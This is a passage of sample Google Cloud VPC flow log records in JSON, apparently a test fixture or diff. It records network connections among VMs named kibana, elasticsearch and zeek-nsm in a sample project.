+{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name"
:"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"67.43.156.14","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name"
:"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373fm","jsonPayload":{"bytes_sent":"125197","connection":{"dest_ip":"10.87.40.76","dest_port":33540,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"242","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"}
+{"insertId":"1gq7q7afe373eg","jsonPayload":{"bytes_sent":"917832","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"230","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373fc","jsonPayload":{"bytes_sent":"55572","connection":{"dest_ip":"67.43.156.14","dest_port":53096,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.219496168Z","packets_sent":"133","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:01.853096315Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373eq","jsonPayload":{"bytes_sent":"4615","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33966},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821049800Z","packets_sent":"75","reporter":"DEST","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ev","jsonPayload":{"bytes_sent":"75612","connection":{"dest_ip":"67.43.156.13","dest_port":65318,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"583","reporter":"SRC","rtt_msec":"96","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373em","jsonPayload":{"bytes_sent":"1461","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":34536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ew","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56478,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373e9","jsonPayload":{"bytes_sent":"64140","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33694},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"371","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name"
:"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f9","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":53096},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373f1","jsonPayload":{"bytes_sent":"231764","connection":{"dest_ip":"10.87.40.76","dest_port":33694,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565311154Z","packets_sent":"251","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:05.566359759Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} 
+{"insertId":"1gq7q7afe373ff","jsonPayload":{"bytes_sent":"107878","connection":{"dest_ip":"67.43.156.13","dest_port":65276,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"614","reporter":"SRC","rtt_msec":"156","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fq","jsonPayload":{"bytes_sent":"595838","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.14","src_port":52430},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"299","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-samp
le-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"14iipwlfd8t01n","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.14","dest_port":56410,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:10.630345069Z","packets_sent":"7","reporter":"SRC","rtt_msec":"37","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:10.514594429Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} 
+{"insertId":"14iipwlfd8t01j","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"192.168.2.117","dest_port":51950,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:41:50.757658840Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:41:50.645030007Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:19.219174745Z"} +{"insertId":"14iipwlfd8t01o","jsonPayload":{"bytes_sent":"361966","connection":{"dest_ip":"67.43.156.13","dest_port":33876,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:37.933154111Z","packets_sent":"80","reporter":"SRC","rtt_msec":"34","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466868771Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:19.219174745Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwor
